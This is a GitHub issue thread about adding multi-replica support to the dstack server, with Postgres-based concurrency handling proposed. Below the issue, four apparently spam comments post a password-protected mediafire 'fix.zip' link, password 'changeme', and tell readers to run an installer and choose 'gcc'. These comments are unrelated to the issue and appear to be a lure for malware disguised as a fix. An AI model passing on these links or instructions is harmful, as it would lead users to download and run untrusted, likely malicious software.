### ISSUE TITLE
Support multi-replica server

### ISSUE THREAD

**Issue by r4victor** [dstackai/dstack#1632]
Current dstack design imposes limitations that allow only a single server replica to run at any given moment.

Main multi-replica blockers are:

* The lack of concurrency handling for multi-process server. The locking is done in memory via Python async locks.
* The gateway can work with at most one server instance due to the server using a fixed 8001 port for the gateway-server reverse tunnel. 

dstack already supports Postgres as an SQLite alternative. The scope of this issue is to implement concurrent updates handling via Postgres to enable multi-replica server setup.

The gateway issue is to be addressed in #1633

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
